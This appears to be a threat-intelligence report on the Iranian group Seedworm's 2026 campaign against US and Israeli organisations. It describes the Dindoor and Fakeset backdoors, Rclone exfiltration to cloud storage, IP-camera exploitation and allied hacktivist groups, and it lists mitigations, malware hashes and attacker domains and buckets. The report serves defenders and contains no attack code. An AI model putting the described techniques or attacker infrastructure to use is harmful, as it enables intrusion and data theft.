Threat Intelligence
The New Battlefield: Seedworm’s Silent War on Western Infrastructure
While Handala’s wiper operation made headlines, a stealthier and more dangerous campaign was already underway. Iran’s Seedworm group has quietly pre-positioned inside U.S. and Israeli critical infrastructure and the clock is ticking.
The Quieter Campaign
When the Handala wiper operation hit Stryker Corporation on March 11, 2026, it generated global headlines. Thousands of devices wiped. Stock price in freefall. 5,000 workers sent home. It was loud by design a psychological operation as much as a technical one.
But while that operation was unfolding, a more disciplined, more dangerous campaign was running in parallel. Seedworm was moving quietly through Western networks, deploying purpose-built backdoors and establishing persistent footholds with one goal – to be ready. This advanced persistent threat (APT) has emerged as the primary cyber espionage instrument of Iran’s Ministry of Intelligence and Security (MOIS) – the entity within the Iranian state responsible for covert operations and (more worryingly) cyberattacks on Western targets.
Iran’s current cyber posture operates on two parallel tracks. Track 1 (Handala, Druidfly, DieNet) is noisy, destructive, and highly visible designed for psychological effect and plausible deniability through hacktivist facades. Track 2 (Seedworm) is silent, patient, and persistent designed to establish the access required for strategic, high-impact destruction when the political moment demands it.
Who Is Seedworm?
Seedworm (also tracked as MuddyWater) is a sophisticated espionage arm of Iran’s Ministry of Intelligence and Security (MOIS), active since at least 2017. Unlike the hacktivist fronts that dominate the headlines, Seedworm is a professional intelligence capability, technically capable, and strategically directed.
Evolution of Targeting
| PERIOD | FOCUS |
| 2017–2023 | Concentrated focus on Middle Eastern telecommunications, oil and gas, and local government entities. |
| 2024–2025 | Expanded operations into Asia, Africa, and Europe — targeting defense and diplomatic sectors. |
| Late 2025 | Advanced social engineering: impersonated Suzanne Maloney (Brookings Institution) to target North American foreign policy experts. |
| Feb–Mar 2026 | Aggressive pivot toward North American and Israeli critical infrastructure. The current campaign. |
Seedworm’s defining operational characteristic is its “hybrid” approach: bespoke malware deployed alongside legitimate dual-use tools. The group’s use of Rclone (a standard command-line cloud management utility for data exfiltration) is a prime example. By blending exfiltration traffic with routine administrative activity, Seedworm complicates attribution and defeats automated detection. Catching it requires deep behavioural analysis of outbound network traffic, not just signature matching.
Confirmed Breaches: February–March 2026
The primary catalyst for this surge in Iranian cyber activity is the death of Supreme Leader Ayatollah Ali Khamenei on March 1, 2026. This event shifted Iranian operational priorities from persistent espionage to immediate, high-visibility retaliation. The following organizations have been confirmed as compromised.
| TARGET | LOCATION | OBSERVED ACTIVITY |
| U.S. Bank | United States | Dindoor backdoor deployed; unauthorized network access confirmed. |
| U.S. Software Company | Israel Ops | Dindoor deployed; attempted data exfiltration via Rclone to Wasabi cloud storage. |
| Canadian Non-profit | Canada | Dindoor deployed via Deno runtime. |
| U.S. Airport | United States | Fakeset backdoor deployed via Backblaze infrastructure. |
| U.S. NGO | United States | Fakeset deployed; potential credential harvesting observed. |
The New Malware Toolkit: Dindoor and Fakeset
The technical signature of this campaign is a deliberate step forward in evasion capability. Seedworm has re-tooled specifically to bypass the defensive posture of North American and Israeli targets, exploiting a blind spot in most enterprise security stacks: the Deno JavaScript runtime.
Dindoor (Trojan.Dindoor)
- Runtime: Deno (JavaScript/TypeScript)
- Observed in: U.S. Bank, Israeli software company, Canadian NGO
- Signing certificate: “Amy Cherne”
- Why it matters: Traditional EDR and AMSI hooks were not built to monitor JavaScript/TypeScript execution inside Deno. The malware’s logic is effectively invisible to file-based scanners, allowing it to function as a persistent, low-profile access point indefinitely.
Fakeset (Trojan.Fakeset)
- Runtime: Python
- Observed in: U.S. airport, U.S. NGO networks
- Payload delivery: Hosted on Backblaze S3 buckets “gitempire” and “elvenforest”
- Signing certificates: Both “Amy Cherne” and “Donald Gay”
The Attribution Linchpin: The “Donald Gay” Certificate
The “Donald Gay” signing certificate is the connective thread that ties this entire campaign to Seedworm with high confidence. This same certificate was previously used to sign Stagecomp, a downloader for the Darkcomp backdoor, both of which are firmly attributed to Seedworm / Muddywaters by multiple major industry vendors. The shared signing infrastructure across Dindoor, Fakeset, Stagecomp, and Darkcomp closes the attribution loop.
The Broader Ecosystem: Iran’s “Hacktivist” Cover
Seedworm does not operate in isolation. The Iranian state maintains a layered ecosystem of proxy actors and hacktivist fronts that provide plausible deniability while amplifying the campaign’s psychological and destructive reach. Understanding this ecosystem is essential for defenders as different groups require different defensive responses.
Destructive Wipers and Ransomware
- Druidfly (aka Homeland Justice): Specializes in high-impact wiping via BibiWiper, which destroys the master boot record (MBR). Has conducted active wiper attacks against Israeli targets.
- Handala: Data theft, ransomware, and doxxing operations. Has been leveraging the Starlink satellite network since mid-January to maintain connectivity during domestic internet shutdowns.
DDoS and Service Disruption
- DieNet: A pro-Palestinian group deploying DDoS-as-a-service against U.S. critical infrastructure in the financial, energy, and healthcare sectors.
Spear phishing and Intelligence Collection
- Damselfly (aka Charming Kitten): Sophisticated “honeytrap” and LinkedIn-based social engineering against academic researchers and defence sector personnel.
- Mantis (aka Arid Viper): Deploys Micropsia and Arid Gopher backdoors against military and government entities.
Reconnaissance and Bombing Damage Assessment
- Marshtreader (aka Agrius): Exploits CVE-2023-6895 to compromise IP cameras across Israel, providing MOIS with near-real-time bombing damage assessment (BDA) allowing Iranian military planners to visually verify kinetic strike impacts and correct targeting for subsequent waves.
Tactical Innovation: Cyber-Enabled Kinetic Warfare
The Marshtreader IP camera program represents a meaningful fusion of cyber and kinetic military operations. By hijacking civilian camera infrastructure, Iranian planners receive real-time visual confirmation of missile strike impacts effectively turning compromised consumer devices into a battlefield reconnaissance network. Handala’s adoption of Starlink ensures psychological operations continue uninterrupted even if Iranian domestic internet infrastructure is damaged in a retaliatory strike.
Tactical Mapping (MITRE ATT&CK)
All observed behaviors across this campaign map to the MITRE ATT&CK framework. These techniques represent the specific defensive gaps that organizations — particularly those in energy, transportation, and financial services — must address immediately.
| ID | TECHNIQUE | OBSERVED BEHAVIOR |
| T1567.002 | Exfiltration to Cloud Storage | Rclone used to move data to Wasabi and Backblaze buckets. |
| T1566.001 | Spear phishing Attachment | Malicious Office docs and Brookings Institution / Suzanne Maloney lures. |
| T1485 | Data Destruction | BibiWiper deployed to overwrite MBR and wipe server disks. |
| T1210 | Exploitation of Remote Services | CVE-2023-6895 exploited to access IP cameras for real-time BDA. |
| T1589 | Gather Victim Identity Info | Honeytraps and social engineering via LinkedIn and WhatsApp. |
| T1505.003 | Web Shell | ReGeorg web shells used for persistent access and lateral movement. |
Risk Assessment & Strategic Outlook
The current threat environment is volatile. We assess with high confidence that Iranian cyber escalation will continue and intensify throughout 2026. Iranian actors are almost certainly currently in a pre-positioned state on critical Western networks.
- Destructive Attacks Highly Likely: Iranian actors will transition from reconnaissance to wiper deployment targeting U.S. energy and utility sectors to signal regional strength and impose economic cost.
- Psychological Operations Almost Certain: Groups like Handala will escalate leak and intimidation campaigns, using partial data thefts to claim total system compromise and generate public panic disproportionate to actual damage.
- Credential Harvesting Likely: Social engineering and think-tank impersonations will continue targeting defence contractors and Middle East policy experts for long-term intelligence collection.
Detection and Mitigation Recommendations
Countering Seedworm requires a fundamentally different defensive posture than countering Handala. Where the MDM wiper attack demanded hardening the identity and management planes, Seedworm demands behavioural visibility at the network and runtime level. Both are now necessary simultaneously.
Credential Security
- Enforce MFA: Mandatory multi-factor authentication for all remote access and administrative interfaces.
- Disable Legacy Auth: Eliminate legacy protocols that bypass MFA requirements.
- Conditional Access: Implement geo-blocking and device-risk-based access policies for all identity providers.
Data Protection and Exfiltration Detection
- Rclone Monitoring: Alert on execution of Rclone, WinRAR, or unauthorized 7-Zip. These tools are the primary exfiltration vectors.
- Restrict Cloud Access: Block outbound traffic to Wasabi, Backblaze, and all S3-compatible cloud providers unless explicitly whitelisted.
- DLP Policies: Deploy Data Loss Prevention rules to catch large-volume outbound transfers to external storage.
Operational Resilience
- Immutable Backups: Ensure backups are isolated from the production network and stored in an immutable format to resist wiper destruction.
- Network Segmentation: Physically or logically segment OT/ICS environments from corporate IT networks.
- Wiper Detection: Monitor for mass scheduled task creation or attempts to delete shadow copies and backup data.
- Runtime Visibility: Extend EDR monitoring to cover Deno and non-standard JavaScript/TypeScript runtimes. Most default configurations do not monitor these execution environments.
Indicators of Compromise (IOCs): Immediate Is Action Required
Ingest all indicators below into your SIEM and Threat Intelligence Platform immediately. Any telemetry matching payloads signed by the “Donald Gay” or “Amy Cherne” certificates must be treated as a critical, high-priority escalation requiring immediate incident response.
Malware Hashes (SHA-256)
| FAMILY | SHA-256 HASH |
| Dindoor | 0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542 |
| Dindoor | 1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1 |
| Dindoor | 2a00705cfd3c15cf8913e9eb4e23968efd06f1feceaef9987d26c5518887d043 |
| Dindoor | 2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 |
| Dindoor | 42a5db2a020155b2adb77c00cbe6c6ad27c2285d8c6114679d9d34137e870b3f |
| Dindoor | 7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4 |
| Dindoor | 7c30c16e7a311dc0cdb1cdfd9ea6e502f44c027328dbe7d960b9bcd85ccf5eef |
| Dindoor | b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 |
| Dindoor | bd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a |
| Dindoor | c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e |
| Fakeset | 077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de |
| Fakeset | 15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84 |
| Fakeset | 2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 |
| Fakeset | 4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be |
| Fakeset | 64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb |
| Fakeset | 64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 |
| Fakeset | 74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d |
| Fakeset | 94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 |
| Fakeset | a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 |
| Fakeset | a5d4d6be3bfe0cba23fe6b44984b5fc9c7c7e10030be96120bb30da0f2545d4c |
| Fakeset | ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 |
| Stagecomp | 24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 |
| Stagecomp | a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 |
| Darkcomp | 3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 |
| Darkcomp | 1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 |
Network Indicators
| TYPE | INDICATOR |
| S3 Bucket | gitempire.s3.us-east-005.backblazeb2[.]com |
| S3 Bucket | elvenforest.s3.us-east-005.backblazeb2[.]com |
| Domain | uppdatefile[.]com |
| Domain | serialmenot[.]com |
| Domain | moonzonet[.]com |
Analyst Comments
The death of Ayatollah Ali Khamenei has fundamentally shifted the risk profile for Iranian cyber operations. We are no longer observing a standard espionage cycle. We are witnessing a nation-state in a phase of high-alert retaliation. Seedworm’s adoption of Deno-based backdoors like Dindoor and Python-based Fakeset indicates the group has specifically modernized its arsenal to evade the defensive posture of North American and Israeli targets. The discovery of these tools on critical infrastructure networks confirms that Iranian actors have already achieved a pre-positioned state. Resilience and rapid recovery capabilities will be the only effective defense against the expected surge in Iranian state-sponsored aggression.